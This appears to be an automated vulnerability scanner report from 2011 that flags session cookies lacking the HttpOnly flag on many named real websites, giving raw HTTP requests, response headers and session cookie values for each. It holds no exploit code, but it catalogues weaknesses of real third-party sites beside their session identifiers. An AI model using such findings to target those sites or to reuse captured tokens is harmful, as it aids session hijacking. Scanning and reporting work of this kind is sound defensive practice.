Request
GET /promo/list5.do HTTP/1.1 Host: www.officedepot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: IBM_HTTP_Server Pragma: No-cache Cache-Control: no-cache,no-store,max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="ALL DEVa TAIa OUR BUS UNI NAV STA PRE" policyref="http://www.officedepot.com/w3c/p3p.xml" Content-Type: text/html;charset=UTF-8 Content-Language: en-US Date: Sat, 05 Feb 2011 22:40:01 GMT Content-Length: 6309 Connection: close Set-Cookie: JSESSIONID=0000N7JB0IDdbJzrbHY1HCK2e8j:13ddq0uth; Path=/ Set-Cookie: jsession_unique_id=1296945606192; Expires=Sun, 06 Feb 2011 00:10:06 GMT; Path=/ Set-Cookie: CU_BRAND=OD; Expires=Tue, 31 Jan 2012 22:40:06 GMT; Path=/ Set-Cookie: IBSD_LOCALE=en_US; Expires=Tue, 31 Jan 2012 22:40:06 GMT; Path=/ Set-Cookie: CID_CART_COOKIE=N7JB0IDdbJzrbHY1HCK2e8j; Expires=Mon, 07 Mar 2011 22:40:06 GMT; Path=/ Set-Cookie: CID_CART_COOKIE=N7JB0IDdbJzrbHY1HCK2e8j; Expires=Mon, 07 Mar 2011 22:40:06 GMT; Path=/ Set-Cookie: CID_CART_COOKIE=N7JB0IDdbJzrbHY1HCK2e8j; Expires=Mon, 07 Mar 2011 22:40:06 GMT; Path=/ Set-Cookie: CID_CART_COOKIE=N7JB0IDdbJzrbHY1HCK2e8j; Expires=Mon, 07 Mar 2011 22:40:06 GMT; Path=/ Set-Cookie: cae_browser=desktop; path=/; domain=.officedepot.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /content/information-security/ HTTP/1.1 Host: www.oit.gatech.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /service/software-distribution/software-distribution HTTP/1.1 Host: www.oit.gatech.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:07:12 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.10 ZendServer/4.0 Set-Cookie: SESS701e63468b7538f49a91969758042315=m62ul61cvi1ckhdg53u2dh1e65; expires=Tue, 01-Mar-2011 01:40:32 GMT; path=/; domain=.oit.gatech.edu Last-Modified: Sat, 05 Feb 2011 09:15:23 GMT ETag: "b0c4a17612c3bdb20d870d94e5608032" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 13613
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.oneview.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sat, 05 Feb 2011 23:02:58 GMT Set-Cookie: JSESSIONID=22619842C67867F5B1EE74469F963957; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding X-Cache: MISS from squid.oneview.de X-Cache-Lookup: MISS from squid.oneview.de:80 Via: 1.0 squid.oneview.de:80 (squid/2.6.STABLE21) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licenses HTTP/1.1 Host: www.opensource.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licenses/gpl-license.php HTTP/1.1 Host: www.opensource.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licenses/mit-license.php HTTP/1.1 Host: www.opensource.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nslookup.html HTTP/1.1 Host: www.orthougm.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /default.asp?promoCode=987-78 HTTP/1.1 Host: www.othawaii.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 22:09:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 7135 Content-Type: text/html Set-Cookie: promoCode=987%2D78; path=/ Set-Cookie: ASPSESSIONIDCADDSQTB=PNOPIINCCOHAAGBEKJOCEMNK; path=/ Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Site Name: Orthopedics Today Hawaii 2012 Developed By: A. Magona ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.pdfforge.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:09:17 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.7 Set-Cookie: SESSc75490b6e05df4b955c54eec3097373b=o8ot6jt3lo29pi8jckb7f0fjc2; expires=Tue, 01-Mar-2011 01:42:37 GMT; path=/; domain=.pdfforge.org Last-Modified: Sat, 05 Feb 2011 22:05:03 GMT ETag: "ff0ffe33d43c31cea41ae173d1fb80bd" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 10866
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <me ...[SNIP]...
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.pointehilton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 22:09:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=16197155;expires=Mon, 28-Jan-2041 22:09:24 GMT;path=/ Set-Cookie: CFTOKEN=66704047;expires=Mon, 28-Jan-2041 22:09:24 GMT;path=/ Content-Type: text/html; charset=UTF-8 Set-Cookie: BIGipServerIMS-6=773065226.20480.0000; path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.pusha.se Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /support/HP-W8000-Desktops-manual/id/3823ag123/t/2 HTTP/1.1 Host: www.retrevo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Set-Cookie: JSESSIONID=7C9CF70A5240CFB9892A007BA287025C; Path=/ Set-Cookie: s_refType=; Domain=.retrevo.com; Expires=Sat, 05-Feb-2011 22:09:28 GMT; Path=/ Set-Cookie: u=4d9f3b67934f473891bc273394b24dad; Domain=.retrevo.com; Expires=Mon, 28-Jan-2041 22:09:27 GMT; Path=/ Set-Cookie: us=4d9f3b67934f473891bc273394b24dad; Path=/ Set-Cookie: ss=65665; Path=/ P3P: policyref="/w3c/p3p.xml", CP="IDC DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT" Location: /support/HP-W8000-Desktops-manual/id/3823ag123/t/2/ Content-Length: 0 Date: Sat, 05 Feb 2011 22:09:27 GMT Server: Apache-Coyote/1.1 Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /privacypolicy.asp HTTP/1.1 Host: www.slackinc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 22:09:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 15320 Content-Type: text/html Set-Cookie: ASPSESSIONIDCACARTTB=JABALOKCHIPGHGJAFOOIMGKB; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /reprints/order.asp HTTP/1.1 Host: www.slackinc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 22:09:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 44530 Content-Type: text/html Set-Cookie: ASPSESSIONIDCACARTTB=MHBALOKCEGMPNINNPNAKBMPM; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>SLACK Incorporated Periodicals Division</title> <STYLE type="text/css"> ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /subscribe/newsubs/atshcstep1.asp HTTP/1.1 Host: www.slackinc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 22:09:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 2544 Content-Type: text/html Expires: Sat, 05 Feb 2011 22:08:47 GMT Set-Cookie: ASPSESSIONIDCACARTTB=KEBALOKCOFGEPEJFNBJCPGGJ; path=/ Cache-control: no-cache
<html> <head> <title>Athletic Training & Sports Health Care Subscription</title> </head> <style> a,body,td, p, blockquote, H5 { font-family: arial, helvetica, sans-serif; font-size:12px; ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /subscribe/newsubs/otistep1.asp HTTP/1.1 Host: www.slackinc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 22:09:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 2526 Content-Type: text/html Expires: Sat, 05 Feb 2011 22:08:43 GMT Set-Cookie: ASPSESSIONIDCACARTTB=JBBALOKCCLGHONAJLBLPKHGK; path=/ Cache-control: no-cache
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /c/s/Tools/ HTTP/1.1 Host: www.smartertechnology.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=gq30qat19nu7cp87h2ahjp4ak6; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cave/narc.php?u=/download?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw&r=http://pagead2.googlesyndication.com/pagead/imgad?id=CK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg&a=Adwords_Unix&cid= HTTP/1.1 Host: www.splunk.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/download?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Apache=173.193.214.243.1296942538894423; XARAYASID=1mtgfd73mkm07svvqv720eu567; Enabled=true
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.startaid.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Online Bookmarks and Favorites - StartA ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=oal2pj01ul0o7c2hngqqi8gu33; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.stumpedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 18:12:57 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.17 Set-Cookie: PHPSESSID=oal2pj01ul0o7c2hngqqi8gu33; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 14654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /index.php/view HTTP/1.1 Host: www.sulit.com.ph Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Server: nginx Date: Sat, 05 Feb 2011 22:19:49 GMT Content-Type: text/html; charset=utf-8 Connection: close Set-Cookie: SESSION_ID=irtoo98lni0bfkq9vmg49fn8t3; path=/; domain=.sulit.com.ph Location: http://www.sulit.com.ph/index.php/page+not+found Content-Length: 0
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.symbaloo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:15:57 GMT Server: Apache/2.2.14 (Ubuntu) Set-Cookie: JSESSIONID=F657FA86143ED37B3FFB0840845C3ADF; Path=/ Accept-Encoding: gzip,deflate Set-Cookie: hasvisited=true; Expires=Thu, 07-Apr-2011 16:15:57 GMT; Path=/ Content-Language: en Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 55620
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="EN"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.tarifcheck24.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sun, 06 Feb 2011 16:15:58 GMT Server: Apache Set-Cookie: PHPSESSID=d96a2f7e678a2798428d897282afc145; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Location: http://www.tarifcheck24.com/d96a2f7e678a2798428d897282afc145/ Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Length: 0
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.technotizie.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.usbjd.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 22:21:38 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=2725183;expires=Mon, 28-Jan-2041 22:21:38 GMT;path=/ Set-Cookie: CFTOKEN=11047330;expires=Mon, 28-Jan-2041 22:21:38 GMT;path=/ Set-Cookie: JSESSIONID=f03049975b529aec19d61d691f7b301a1652;path=/ Content-Type: text/html; charset=UTF-8
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.viadeo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 303 Voir Autre Date: Sun, 06 Feb 2011 16:16:09 GMT Server: Apache Set-Cookie: JSESSIONID=3B4ECBE6DEBEC0E4A014395022499777.tomcat8; Path=/ P3P: policyref="http://www.viadeo.com/w3c/p3p.xml",CP="ALL DSP COR DEVa TAIa OUR BUS UNI" Location: /en/connexion/ Content-Type: text/html;charset=ISO-8859-1 Set-Cookie: Coyote-2-a030164=a040108:0; path=/ Accept-Ranges: bytes Cache-Control: private, no-store Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Length: 13
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.vibrantmedia.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 35912 Content-Type: text/html Server: Microsoft-IIS/7.5 Set-Cookie: ASPSESSIONIDQCCTAQAD=DJOEDIPCFAMNFFGAJPMFFPIK; path=/ p3p: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" X-Powered-By: ASP.NET Date: Sun, 06 Feb 2011 16:16:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Vibrant - The Leaders of Contex ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /about/board.asp HTTP/1.1 Host: www.vibrantmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: maintab=tcontent2; ASPSESSIONIDQADSARBD=AKAGFMCCECLPJIFLFOEMFLCL;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 34133 Content-Type: text/html Server: Microsoft-IIS/7.5 Set-Cookie: ASPSESSIONIDQCCTAQAD=HJOEDIPCILHJIDAFPKHHLCEA; path=/ p3p: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" X-Powered-By: ASP.NET Date: Sun, 06 Feb 2011 16:16:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 strict//EN" "DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Vibrant Board of Directors</tit ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /about/index.asp HTTP/1.1 Host: www.vibrantmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: maintab=tcontent2; ASPSESSIONIDQADSARBD=AKAGFMCCECLPJIFLFOEMFLCL;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 30183 Content-Type: text/html Server: Microsoft-IIS/7.5 Set-Cookie: ASPSESSIONIDQCCTAQAD=PJOEDIPCIHEHAPPCDPMEOBPI; path=/ p3p: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" X-Powered-By: ASP.NET Date: Sun, 06 Feb 2011 16:16:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>About Vibrant</title> <meta ht ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /whatisIntelliTXT.asp HTTP/1.1 Host: www.vibrantmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 92116 Content-Type: text/html Server: Microsoft-IIS/7.5 Set-Cookie: ASPSESSIONIDQADSARBD=DCOFFMCCFPNFLDGDLGJAJMGA; path=/ p3p: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" X-Powered-By: ASP.NET Date: Sat, 05 Feb 2011 22:20:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <titl ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944 HTTP/1.1 Host: www.walmart.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <head> <title> - Walmart</title> <link href="http://i2.walmartimages.com/css/global.css" rel="stylesheet" typ ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.webnews.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.wechseln.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 302 Found Set-Cookie: rs_session=c85c671ecf8776c8ec6ef8de3b42eacb; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Location: http://www.wechseln.de/4dbe2d9463a0eee85e2ad2c92c536101/ Content-type: text/html Content-Length: 0 Connection: close Date: Sun, 06 Feb 2011 16:16:17 GMT Server: w4
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /widget/bookmarks-kledyde HTTP/1.1 Host: www.widgetbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sun, 06 Feb 2011 16:16:18 GMT Server: Apache/2.2.3 (Red Hat) Set-Cookie: JSESSIONID=B384C80E93F9283766F9CE859A3180E5; Path=/, node=1027; path=/ Content-Language: en-US Vary: Accept-Encoding P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Connection: close Content-Type: text/html;charset=UTF-8
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.xerpi.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sun, 06 Feb 2011 16:16:21 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8l DAV/2 Phusion_Passenger/3.0.2 X-Powered-By: Cache-Control: no-cache Set-Cookie: _xerpi3_session_id=fe6ebee29506267afbba15fe0a34d40e; path=/ Location: http://www.xerpi.com/account/login Content-Length: 100 Status: 302 Found Connection: close Content-Type: text/html; charset=utf-8
<html><body>You are being <a href="http://www.xerpi.com/account/login">redirected</a>.</body></html>
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en_US/hi/customersupport/site-usage.do HTTP/1.1 Host: www1.hilton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en_US/hi/index.do HTTP/1.1 Host: www1.hilton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /business-credit-cards/ HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /business-credit-cards/business-card-compare/business-travel-rewards-credit-cards/29789?inav=menu_cards_sbc_comparecards HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:21:41 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296944501386119; path=/; expires=Tue, 09-Feb-16 22:21:41 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000q3QZbDYOcyvtP0PZminOCss:1115nbtvb;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 200661
